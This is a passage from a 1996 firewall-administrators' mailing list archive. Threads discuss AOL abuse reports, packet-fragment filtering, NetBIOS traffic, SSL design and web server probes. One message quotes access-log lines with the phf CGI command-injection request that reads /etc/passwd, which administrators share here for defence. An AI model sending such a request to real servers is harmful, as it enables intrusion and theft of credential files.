responsive to the >security issues their users create? You don't see these types of >problems originating from Compuserve. I realize that hackers could go to >other resources, but the simple fact is that AOL generates more email >bombers, faked email, and probing hackers than any other single source, >and their abuse@aol.com address is next to useless. I've sent messages >as Postmaster@, which should be treated with a modicum of respect, and >received nothing more than an auto-reply, never, ever, a single personal >response. Block aol.com. If everyone blocks AOL, then a lot of their inet users will question AOL on "full internet access".. The only drawbacks here are that some of your users depend on AOL for the user base and whatever your clients are selling/marketing etc... Shane _/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/ _/ Shane T Kinsch BRITE VOICE SYSTEMS, INC. _/ _/ shane.kinsch@brite.com UNIX SYSTEM ADMINISTRATOR _/ _/ Wichita, KS USA VP UNIX ENGINEERING _/ _/ http://www.brite.com "MIME is ok here" _/ _/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/ From firewalls-owner Sat Jul 13 10:47:44 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA09896 for firewalls-outgoing; Sat, 13 Jul 1996 10:33:37 -0700 (PDT) Received: from mailbox.neosoft.com (mailbox.neosoft.com [206.109.1.16]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id KAA09888 for ; Sat, 13 Jul 1996 10:33:30 -0700 (PDT) Received: from fw.nmti.com (fw.baileynm.com [206.109.159.11]) by mailbox.neosoft.com (8.7.5/8.7.3) with SMTP id MAA08413; Sat, 13 Jul 1996 12:30:19 -0500 (CDT) Received: from web.nmti.com(198.178.0.201) by fw.nmti.com via smap (V1.3) Received: from sonic.nmti.com (peter@sonic.nmti.com [198.178.0.2]) by web.nmti.com (8.6.12/8.6.9) with SMTP id LAA17076; Sat, 13 Jul 1996 11:29:04 -0500 Received: by sonic.nmti.com; id AA19394; Sat, 13 Jul 1996 11:29:03 -0500 From: peter@baileynm.com (Peter da Silva) Message-Id: <9607131629.AA19394@sonic.nmti.com.nmti.com> Subject: Re: IP Masquerading and vulnerabilities To: cosmo@ebs.net (Craig Brozefsky) Date: Sat, 13 Jul 1996 11:29:03 -0500 (CDT) Cc: firewalls@GreatCircle.COM In-Reply-To: from "Craig Brozefsky" at Jul 12, 96 07:45:56 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > 1. Fragmenting packets so that port information is passed in second > packet and the filter only looks at first so it lets it go thru. I > know this is a possibility with various packet filtering firewalls on > the market now. Linux 2.0 has an option to re-assemble all fragmented > packets going thru it before applying the filter which stops it. Or just block packets that are too short to hold all the options. If you try and reassemble all the fragments that opens you up to a denial of service attack, and there really isn't any legitimate need to have packets that short. From firewalls-owner Sat Jul 13 14:32:44 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA17647 for firewalls-outgoing; Sat, 13 Jul 1996 14:23:15 -0700 (PDT) Received: from cronus.icorp.net (cronus.icorp.net [206.61.96.10]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id OAA17639 for ; Sat, 13 Jul 1996 14:23:06 -0700 (PDT) Received: from hephaestus.icorp.net (ewieling@hephaestus.icorp.net [206.104.128.226]) by cronus.icorp.net (8.6.12/8.6.12) with SMTP id QAA06617; Sat, 13 Jul 1996 16:19:44 -0500 Message-ID: <31E812E9.794BDF32@hephaestus.icorp.net> Date: Sat, 13 Jul 1996 16:19:37 -0500 From: Eric Wieling Organization: InterCommerce Corporation X-Mailer: Mozilla 2.02 (X11; I; BSD/OS 2.0 i386) MIME-Version: 1.0 To: Helmut Springer CC: ishikawa@personal-media.co.jp, Firewalls@GreatCircle.COM Subject: Re: udp 137 broadcast from Win95 PC References: <9607031234.AA29367@info2.rus.uni-stuttgart.de> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Helmut Springer wrote: > netbios-ns 137/tcp # NETBIOS Name Service > netbios-ns 137/udp # NETBIOS Name Service Does any server respond to TCP requests on this port? Does any client make TCP requests on this port? --Eric -- Eric Wieling Advanced Network Research InterCommerce Corporation Pager: 800-758-3680 If you consistently take an antagonistic approach, however, people are going to start thinking you're from New York. :-) --Larry Wall to Dan Bernstein From firewalls-owner Sat Jul 13 20:21:25 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id UAA25750 for firewalls-outgoing; Sat, 13 Jul 1996 20:02:08 -0700 (PDT) Received: from mark.allyn.com (mark.allyn.com [206.114.135.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id UAA25743 for ; Sat, 13 Jul 1996 20:02:01 -0700 (PDT) Received: (from allyn@localhost) by mark.allyn.com (8.7.5/8.7) id UAA11030; Sat, 13 Jul 1996 20:03:31 -0700 (PDT) From: Mark Allyn 206-860-9454 Message-Id: <199607140303.UAA11030@mark.allyn.com> Subject: Re: Extending Financial Applications And Protecting via a Firewall To: mdr@vodka.sse.att.com Date: Sat, 13 Jul 1996 20:03:31 -0700 (PDT) Cc: allyn@allyn.com, howzit@worldnet.att.net, Firewalls@GreatCircle.COM In-Reply-To: <199607121640.LAA08245@ihig2.att.att.com> from "mdr@vodka.sse.att.com" at Jul 12, 96 12:46:13 pm X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello Mark: Thanks for the note. I might have been a little naive about all of this. First of all, in response to my suggestion about using SSL combined with password authentication, you suggested problems wiht session hijacking (I hope this is a good term) as well as DNS spoofing. Here is where I may have got a little fuzzy. I had assumed that when a session is under SSL encryption, the user's account name and password, as entered in the secure browser (assuming Netscape), are encrypted at the browser end and are under cover until they gat at the server. If they are under cover, along with the rest of the session, then if the session is hijacked by someone else, I would think that the person who hijacked the session would have to have the correct key to decrypt the encrypted session. Now, maybe I am wrong, but I thought that when an SSL client (Netscape Browser) initiates a session with sn SSL server; there is a brief RSA public key encryped transaction to negociate a DES key for the session itself. Since this is under RSA public key cover, someone else could not sniff out the DES key. If the RSA encrypted session were to be hijacked, then the legitimate client would never get the DES key and the session would be aborted before the user would even get a chance to enter the password. The hijacker would not know the password and could not get into the payroll system even though he may have stolen a secure web session. In regards to the DNS hacks, I was under the impression that with the newer browsers (Netscape 2.??) that a key pair can be pre-entered into the browser as well as the server, in which case the browser would only trust that key pair and not any of the keys that have been set up with the key registries such as Varisign. If this is the case, then the hijacker's server (the one which the hijacker diverts the client browser to) would not have a valid key pair according to the data that was pre-entered into it ahead of time. I have been envisioning that the company with the payroll system would pre-issue key pairs to their employees with instructions to enter them into their browsers and to only trust those keys and no others for their payroll transactions. In regards of host security, I was thinking of drop dead daemon. Something that would detect any sense of anomoly within the web server. It could look for any unauthorized processes (shells, ftp sessions; whatever). Perhaps it could even communicate with the seb server daemon itself. If anything is detected, it would go into shutdown and halt the server. Of course, this would have to have some forgiveness for mistakes on the part of the users, but if the users have some sort of training, and know that their sessions were closely monitored, it could be set up fairly tight. Any URL's passed to the web server which appear to be attempts to try to run compromised CGI files (which are know, and of course removed) would signal the drop dead daemon who would log as much as possible and then shut the machine down. All of this would require another machine (one inside the company) to constantly ping the machine to ensure that it is up, and when the drop dead daemon shuts the machine down, it would immediately make the appropriate alarms and pages to system administrators. If a system is halted like this, then no hacks could get into it and do anything. The two filters would block anything from going directly through from the outsidd to the inside. Please, I hope this is clear. I never did well in English. Mark Allyn allyn@allyn.com From firewalls-owner Sat Jul 13 23:32:45 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id XAA01772 for firewalls-outgoing; Sat, 13 Jul 1996 23:21:08 -0700 (PDT) Received: from neon.ingenia.com (neon.ingenia.com [205.207.219.29]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id XAA01765 for ; Sat, 13 Jul 1996 23:21:02 -0700 (PDT) Received: (from shaver@localhost) by neon.ingenia.com (8.8.Alpha.2/8.6.9) id CAA20357; Sun, 14 Jul 1996 02:17:52 -0400 From: Mike Shaver Message-Id: <199607140617.CAA20357@neon.ingenia.com> Subject: Re: IP Masquerading and vulnerabilities To: peter@baileynm.com (Peter da Silva) Date: Sun, 14 Jul 1996 02:17:52 -0400 (EDT) Cc: cosmo@ebs.net, firewalls@GreatCircle.COM In-Reply-To: <9607131629.AA19394@sonic.nmti.com.nmti.com> from "Peter da Silva" at Jul 13, 96 11:29:03 am X-Mailer: ELM [version 2.4 PL24 PGP3 *ALPHA*] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Thus spake Peter da Silva: > > > Linux 2.0 has an option to re-assemble all fragmented > > packets going thru it before applying the filter which stops it. > > Or just block packets that are too short to hold all the options. If you try > and reassemble all the fragments that opens you up to a denial of service > attack, and there really isn't any legitimate need to have packets that > short. The Linux 2.0 CONFIG_ALWAYS_DEFRAG stuff is designed to make the transparent proxy and NAT code more correct; otherwise, you can get things like PORT commands (which matter to the NAT stuff, obviously) split between 2 fragments. My recommendation is that the transparent proxy stuff is better than the NAT stuff (Darren? =) ), but it's not quite as plug-and-play. Mike -- #> Mike Shaver (shaver@ingenia.com) Ingenia Communications Corporation <# #> Chief System Architect and Herder of Bits <# #> <# #> "Yoda say, `Just slap a little public key crypto into it' does not <# #> a secure system make." -- Marcus J. Ranum (mjr@clark.net) <# From firewalls-owner Sat Jul 13 23:47:45 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id XAA02317 for firewalls-outgoing; Sat, 13 Jul 1996 23:44:20 -0700 (PDT) Received: from nethost.whanganui.ac.nz (nethost.whanganui.ac.nz [202.49.198.67]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id XAA02292 for ; Sat, 13 Jul 1996 23:44:10 -0700 (PDT) Received: from shadowfax.whanganui.ac.nz (shadoxfax.whanganui.ac.nz [202.49.199.35]) by nethost.whanganui.ac.nz (8.6.12/8.6.6) with ESMTP id SAA28633 for ; Sun, 14 Jul 1996 18:40:51 +1200 Received: from ADMIN/FAR by shadowfax.whanganui.ac.nz (Mercury 1.21); Received: from FAR by ADMIN (Mercury 1.11); Sun, 14 Jul 96 18:38:57 +1100 Received: from rovepc.whanganui.ac.nz by shadowfax.whanganui.ac.nz (Mercury 1.21); Comments: Authenticated sender is From: "Emmanuel Turner" To: firewalls@GreatCircle.COM Date: Sun, 14 Jul 1996 18:36:24 +1200 Subject: RE: Dirty Dogs Reply-to: et@shadowfax.whanganui.ac.nz X-mailer: Pegasus Mail for Windows (v2.23) Message-ID: <2BA69D46846@shadowfax.whanganui.ac.nz> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I've just checked my httpd accesslogs and found that my Polytech's server has been subjected to the cgi-bin/phf hack too. As far as I can tell, no damage was done, though the hackers tried to : - Kill processes on the server - Reboot the server - Create user accounts - View the passwd file - delete files The attacks have come from various places and I've emailed the site admins, it will be interesting to see what kind of response I get. Lets just hope that the response is better than the one AOL gives :-) --------------- Emmanuel Turner IT Dept Wanganui Polytech NB : All opinions expressed, spelling and grammatical errors are mine and not my employers. From firewalls-owner Sun Jul 14 00:47:46 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id AAA05393 for firewalls-outgoing; Sun, 14 Jul 1996 00:36:35 -0700 (PDT) Received: from elaine15.Stanford.EDU (elaine15.Stanford.EDU [36.216.0.198]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id AAA05386 for ; Sun, 14 Jul 1996 00:36:29 -0700 (PDT) Received: (from jkoum@localhost) by elaine15.Stanford.EDU (8.7.5/8.7.3) id AAA13566; Sun, 14 Jul 1996 00:33:20 -0700 (PDT) Date: Sun, 14 Jul 1996 00:33:20 -0700 (PDT) From: Jan Koum To: Emmanuel Turner cc: firewalls@GreatCircle.COM Subject: phf hole (WAS: RE: Dirty Dogs ) In-Reply-To: <2BA69D46846@shadowfax.whanganui.ac.nz> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I've just checked my httpd accesslogs and found that my Polytech's > server has been subjected to the cgi-bin/phf hack too. As far as I > can tell, no damage was done, though the hackers tried to : > - Kill processes on the server > - Reboot the server > - Create user accounts If your httpd runs as `nobody` like it should, all of the above had to fail. > - View the passwd file > - delete files Viewing world readable files most likely was succeeded. If some users have .rhosts world readable, they might have being read also. > The attacks have come from various places and I've emailed the site > admins, it will be interesting to see what kind of response I get. > Lets just hope that the response is better than the one AOL gives :-) Hope you will be able to prove it was wrong for them to surf the web. I had trouble doing that. -- yan From firewalls-owner Sun Jul 14 08:03:14 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA21048 for firewalls-outgoing; Sun, 14 Jul 1996 07:48:02 -0700 (PDT) Received: from morebbs.com (morebbs.com [206.165.150.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id HAA21039 for ; Sun, 14 Jul 1996 07:47:56 -0700 (PDT) From: meowmyx@morebbs.com Received: by morebbs.com Message-ID: <9607141044.0F3JN00@morebbs.com> Organization: MORE BBS X-Mailer: TBBS/TIGER v1.0/PRIMP 1.56p Date: Sun, 14 Jul 96 10:44:51 Subject: Ports 137 & 138 To: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The response to my post on the attempted cgi hacks was very gratifying Thank You all who responded I learned quite a bit from that Several people have posted about connects on ports 137 and 138 These connections may not be quite as innocent as they look A guy gave Flash six screen captures of an attempted hack over these ports Flash didnt like them because they were not pictures of naked women and gave them to me Connects to port 137 and 138 NetBios Names Service show IP packet to one of these ports containing UDP packet containing NetBios packet which includes the NetBios name of the target system and also contains a Microsoft Message Server Block packet \MAILSLOT\BROWSE command The guy who gave the screen shots to Flash says two European machines are spoofing IP addresses that belong to a manufacturer in British Columbia The two machines are sending packets in this form across the Internet to the router that connects to the mail system of the Canadian company The guy says the company is aware of the problem and has a security specialist looking at it The significance I see here is the number of applications on LAN servers that will respond to MSB commands Maybe people with more experience will see than I do MeOwMyx ----- All dogs are invited to lunch in my kitty litter ----- From firewalls-owner Sun Jul 14 11:03:16 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA29082 for firewalls-outgoing; Sun, 14 Jul 1996 10:56:00 -0700 (PDT) Received: from count04.mry.scruznet.com (count04.mry.scruznet.com [204.147.227.68]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id KAA29067 for ; Sun, 14 Jul 1996 10:55:53 -0700 (PDT) From: firewalls@count04.mry.scruznet.com Received: from count04.mry.scruznet.com (localhost [127.0.0.1]) by count04.mry.scruznet.com (8.7.3/8.7.1) with ESMTP id KAA04146; Sun, 14 Jul 1996 10:56:23 -0700 (PDT) Message-Id: <199607141756.KAA04146@count04.mry.scruznet.com> To: meowmyx@morebbs.com cc: firewalls@GreatCircle.COM, firewalls@count04.mry.scruznet.com Subject: Re: Dirty dogs In-reply-to: Your message of "Wed, 10 Jul 1996 15:28:54." Date: Sun, 14 Jul 1996 10:56:22 -0700 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Subject: Dirty dogs >To: firewalls@GreatCircle.COM >Sender: firewalls-owner@GreatCircle.COM >Precedence: bulk > > >I was browsing through the system files of a web server that sits outside a >firewall There were a couple of interesting entries in the access log > >960412access:198.69.26.81 - - [12/Apr/1996:04;24;42 -0400] >"GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 207 > >960222access:152.163.192.15 - - [21/Jun/1996:12:19:22 -0400] >"GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 207 > >This didnt work for two reasons One there is no phf program in the system >Two the cgi application gateway is running chrooted > >I am not really very good at understanding this hacking and cracking stuff >What else could they have tried that might have worked > # whois 152.163 America Online (NET-ANS-BNET8) 8619 Westwood Center Drive Vienna, VA 22182 Netname: AOL-BNET Netnumber: 152.163.0.0 Coordinator: Mackey, Bruce (BM814) Mackey@AOL.COM 703-453-4414 Domain System inverse mapping provided by: HP81.PROD.AOL.NET 192.203.190.18 OPS01.OPS.AOL.COM 152.163.80.11 DNS-AOL.ANS.NET 198.83.210.28 Record last updated on 29-Nov-95. # whois 198.69.26 InterNIC Registration (INTERNIC-BLK) INTERNIC-BLK1 198.0.0.0 - 198.255.255.0 Sprint Government Systems Division (NETBLK-SPRINTBLK) NETBLK-SPRINTBLK 198.67.0.0 - 198.70.255.0 # whois NETBLK-SPRINTBLK Sprint Government Systems Division (NETBLK-SPRINTBLK) 13221 Woodland Park Road Herndon, VA 22071 Netname: NETBLK-SPRINTBLK Netblock: 198.67.0.0 - 198.70.255.0 Coordinator: Sprint Network Info. & Support Center (SPRINT-NOC) noc@sprintlink.net (800) 669-8303 Alternate Contact: Albanese, Ken (KA13) albanese@SPRINTLINK.NET (703) 904-2361 Domain System inverse mapping provided by: ICM1.ICP.NET 192.94.207.66 NS1.SPRINTLINK.NET 204.117.214.10 NS2.SPRINTLINK.NET 199.2.252.10 NS3.SPRINTLINK.NET 204.97.212.10 Record last updated on 21-Jan-96. hmm, firewall From firewalls-owner Sun Jul 14 13:03:13 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA03466 for firewalls-outgoing; Sun, 14 Jul 1996 12:48:30 -0700 (PDT) Received: from roble.com (roble.com [207.5.40.50]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id MAA03459 for ; Sun, 14 Jul 1996 12:48:25 -0700 (PDT) Received: (from marquis@localhost) by roble.com (8.7.5/8.7.3) id MAA12751; Sun, 14 Jul 1996 12:45:17 -0700 (PDT) Date: Sun, 14 Jul 1996 12:45:17 -0700 (PDT) From: Roger Marquis To: Firewalls@GreatCircle.COM Subject: RE: Dirty Dogs on AOL Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Russ wrote: >Anyone got any ideas as to how we can make AOL more responsive to the >security issues their users create? If you find a way please let us know. I heard of a number of people who regularly receive abusive and harassing email from AOL accounts. Even where 1) the user IDs and real names are known, 2) AOL has been asked repeatedly, 3) the messages, including headers are many and conclusive, and 4) after several calls and faxes by a lawyer, they neither respond nor take any action to correct the problem. >I realize that hackers could go to >other resources, but the simple fact is that AOL generates more email >bombers, faked email, and probing hackers than any other single source, >and their abuse@aol.com address is next to useless. Without question, AOL is the only major ISP to have a total "hand's off" policy in this regard. Netcom, PSI, UUNET, BARRNET, MCI, and Sprint all seem to be reasonably responsive (in my experience). I wonder if any of this is a factor in the recently filed class action suit against AOL. Roger Marquis From firewalls-owner Sun Jul 14 15:33:14 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA10512 for firewalls-outgoing; Sun, 14 Jul 1996 15:16:48 -0700 (PDT) Received: from maryann.ebs.net (maryann.ebs.net [204.254.158.8]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id PAA10502 for ; Sun, 14 Jul 1996 15:16:40 -0700 (PDT) Received: (from uucp@localhost) by maryann.ebs.net (8.7.5/8.6.9) id RAA25527; Sun, 14 Jul 1996 17:18:49 -0500 Received: from gilligan.ebs.net(204.254.158.13) by maryann.ebs.net via smap (V1.3) Date: Sun, 14 Jul 1996 17:13:10 -0500 (CDT) From: Craig Brozefsky To: Peter da Silva cc: firewalls@GreatCircle.COM Subject: Re: IP Masquerading and vulnerabilities In-Reply-To: <9607131629.AA19394@sonic.nmti.com.nmti.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Sat, 13 Jul 1996, Peter da Silva wrote: > > 1. Fragmenting packets so that port information is passed in second > > packet and the filter only looks at first so it lets it go thru. I > > know this is a possibility with various packet filtering firewalls on > > the market now. Linux 2.0 has an option to re-assemble all fragmented > > packets going thru it before applying the filter which stops it. > > Or just block packets that are too short to hold all the options. If you try > and reassemble all the fragments that opens you up to a denial of service > attack, and there really isn't any legitimate need to have packets that > short. > I'll have to look at the Linux 2.0.* source to see if it does this, or does someone know already, and if not have a patch? I think the method that Peter suggested is the most efficient and would also take care of some other funniness. Craig Brozefsky cosmo@ebs.net System Administrator vox: 312-226-1675 EBS.NET http://www.ebs.net *****available for limited time only in this dimension**** From firewalls-owner Sun Jul 14 15:48:09 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA10629 for firewalls-outgoing; Sun, 14 Jul 1996 15:21:24 -0700 (PDT) Received: from maryann.ebs.net (maryann.ebs.net [204.254.158.8]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id PAA10615 for ; Sun, 14 Jul 1996 15:21:14 -0700 (PDT) Received: (from uucp@localhost) by maryann.ebs.net (8.7.5/8.6.9) id RAA25565; Sun, 14 Jul 1996 17:23:25 -0500 Received: from gilligan.ebs.net(204.254.158.13) by maryann.ebs.net via smap (V1.3) Date: Sun, 14 Jul 1996 17:17:42 -0500 (CDT) From: Craig Brozefsky To: Mike Shaver cc: Peter da Silva , firewalls@GreatCircle.COM Subject: Re: IP Masquerading and vulnerabilities In-Reply-To: <199607140617.CAA20357@neon.ingenia.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Sun, 14 Jul 1996, Mike Shaver wrote: > > Or just block packets that are too short to hold all the options. If you try > > and reassemble all the fragments that opens you up to a denial of service > > attack, and there really isn't any legitimate need to have packets that > > short. > > The Linux 2.0 CONFIG_ALWAYS_DEFRAG stuff is designed to make the > transparent proxy and NAT code more correct; otherwise, you can get > things like PORT commands (which matter to the NAT stuff, obviously) > split between 2 fragments. > > My recommendation is that the transparent proxy stuff is better than > the NAT stuff (Darren? =) ), but it's not quite as plug-and-play. I have no problem setting up some proxies from the FWTK, particularly since the application I'm looking at would be predominantly Windows users who would not be using any other services except the ones which the FWTK already has proxies for. Damn, now if only I could get rid of the need for NFS on my current network and I'de have that bastid pretty tightly secured. Craig Brozefsky cosmo@ebs.net System Administrator vox: 312-226-1675 EBS.NET http://www.ebs.net *****available for limited time only in this dimension**** From firewalls-owner Sun Jul 14 18:18:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA18698 for firewalls-outgoing; Sun, 14 Jul 1996 18:05:28 -0700 (PDT) Received: from interlock.ans.net (interlock.ans.net [147.225.5.5]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id SAA18691 for ; Sun, 14 Jul 1996 18:05:19 -0700 (PDT) Received: by interlock.ans.net id AA24479 Message-Id: <199607150101.AA24479@interlock.ans.net> Received: by interlock.ans.net (Protected-side Proxy Mail Agent-2); Received: by interlock.ans.net (Protected-side Proxy Mail Agent-1); From: Dan Simoes Subject: Re: Dirty Dogs on AOL To: marquis@roble.com (Roger Marquis) Date: Sun, 14 Jul 1996 21:01:58 -0400 (EDT) Cc: Firewalls@GreatCircle.COM In-Reply-To: from "Roger Marquis" at Jul 14, 96 12:45:17 pm X-Mailer: ELM [version 2.4 PL25 PGP6] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I don't want to make this into a "I love/hate AOL" thread, which does not belong on this list, but I wanted to address two points from previous emails. > >I realize that hackers could go to > >other resources, but the simple fact is that AOL generates more email > >bombers, faked email, and probing hackers than any other single source, > >and their abuse@aol.com address is next to useless. AOL is the single largest point of entry to the net (6M+ members) so it is to be expected that there is a proportionally large number of problems caused by AOL users. I've found that mailing to postmaster@aol.com gets good results in tracking abuses. I was quite impressed upon my first visit to AOL to discover that they have a small department dedicated to mail/news/security abuses. Whatever problems AOL brought to the net years ago, they are committed to avoiding and being good netizens. > Without question, AOL is the only major ISP to have a total "hand's > off" policy in this regard. Netcom, PSI, UUNET, BARRNET, MCI, and > Sprint all seem to be reasonably responsive (in my experience). I > wonder if any of this is a factor in the recently filed class action > suit against AOL. AOL is not exactly what I'd call an ISP, but I have found AOL to be quite responsive in addressing problems caused by their users. The class action suit you mention is about billing issues, not security. Yes, ANS is owned by AOL, but I am speaking as a fellow sysadmin/ listowner/security-type, not as an employee. | Dan | -- Dan Simoes dans@ans.net ANS http://coimbra.ans.net/dans.html 100 Clearbrook Road (914) 789-5378 (voice) Elmsford, NY 10523 (914) 789-5310 (fax) From firewalls-owner Mon Jul 15 04:48:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA12915 for firewalls-outgoing; Mon, 15 Jul 1996 04:43:58 -0700 (PDT) Received: from macroint.com (ns [199.34.38.229]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id EAA12898 for ; Mon, 15 Jul 1996 04:43:53 -0700 (PDT) Received: from ccmail.macroint.com ([172.16.4.2]) by gateway.macroint.com with SMTP id <61448>; Mon, 15 Jul 1996 07:32:05 -0400 Received: from ccMail by ccmail.macroint.com (SMTPLINK V2.11.01) Date: Mon, 15 Jul 1996 08:36:46 -0400 From: "WILDBERGER" Message-Id: <9606158374.AA837441588@ccmail.macroint.com> To: Firewalls@GreatCircle.COM Subject: Re: Firewalls-Digest V5 #417 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Majordomo@GreatCircle.COM From firewalls-owner Mon Jul 15 05:03:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA12722 for firewalls-outgoing; Mon, 15 Jul 1996 04:41:03 -0700 (PDT) Received: from smtpgate.saa-cons.co.uk (haddock.demon.co.uk [158.152.16.191]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id EAA12715 for ; Mon, 15 Jul 1996 04:40:51 -0700 (PDT) Received: by smtpgate.saa-cons.co.uk (8.6.8.1/1.3-eef) Received: from haddock.saa-cons.co.uk(193.132.156.161) by amnesiac via smap (V1.3) Received: by haddock.saa-cons.co.uk (AIX 3.2/UCB 5.64/5.00) Date: Mon, 15 Jul 1996 12:25:11 +0100 (BST) From: Dave Roberts To: Firewalls@GreatCircle.COM Subject: Re: Dirty Dogs on AOL In-Reply-To: <199607150101.AA24479@interlock.ans.net> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Sun, 14 Jul 1996, Dan Simoes wrote: > of problems caused by AOL users. I've found that mailing to > postmaster@aol.com gets good results in tracking abuses. Oh really? Sorry to sound cynical, but I suppose that has nothing to do with your mailing address :) On another mailing list to which I subscribed, we were pounded with spams, at least one a day. Firstly, I mailed the postmaster, with a copy of the headers, and informed them of the problem. I heard nothing. After a week of spams, I mailed again, pointed out that we now had 7 of these, and asked *politely* if something could be done about it. etc etc I continously asked for help in identifying the problem (the list admin was away at the time), and never received anything. Eventually the spams stopped, but the person simply moved lists. I am sure that their postmaster(s) have numerous mails of all sorts of complaints due to their number of users, but to ignore all of my mails - I consider that to be plain rude, and certainly not a "good result". - Dave. From firewalls-owner Mon Jul 15 05:39:26 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA16141 for firewalls-outgoing; Mon, 15 Jul 1996 05:21:42 -0700 (PDT) Received: from zaphod.axion.bt.co.uk (dns0.axion.bt.co.uk [132.146.5.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id FAA16109 for ; Mon, 15 Jul 1996 05:21:29 -0700 (PDT) Received: from syntegra.bt.co.uk (actually access1.syntegra.bt.co.uk) by zaphod.axion.bt.co.uk with SMTP (PP); Received: from pc-lyndon ([193.113.72.55]) by syntegra.bt.co.uk (5.x/SMI-SVR4) id AA23902; Mon, 15 Jul 1996 13:22:11 +0100 Message-Id: <31EA36C3.2615@syntegra.bt.co.uk> Date: Mon, 15 Jul 1996 13:17:07 +0100 From: Lyndon David Organization: Syntegra X-Mailer: Mozilla 2.02 (Win16; I) Mime-Version: 1.0 To: firewalls@greatcircle.com Subject: Re: Freeware Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Dear All, One thing to remember about freeware is that the source is available and will have been looked at long and hard by the members of this group and hence likely that defects found. This comes back to the old flame war of should we or should we not require the source for security software. My gut feeling is that the more complex the product and the more wizards and gui's involved the easier it is to miss something. Freeware is often very good but requires a greater effort on the part of the installer. Lyndon David ------------------------------------ Please use email address lyndond@sentinet.co.uk for direct contact. I am just working as a contractor for Syntegra. From firewalls-owner Mon Jul 15 06:23:53 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA20194 for firewalls-outgoing; Mon, 15 Jul 1996 06:05:48 -0700 (PDT) Received: from dsacg1.dsac.dla.mil (dsacg1.dsac.dla.mil [131.78.1.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id GAA20187 for ; Mon, 15 Jul 1996 06:05:40 -0700 (PDT) Received: by dsacg1.dsac.dla.mil (1.38.193.5/1.40 (DSDC Columbus DSDCG1)) From: nto2584@dsacg1.dsac.dla.mil (Steven C. Payne) Message-Id: <9607151300.AA19433@dsacg1.dsac.dla.mil> Subject: Re: 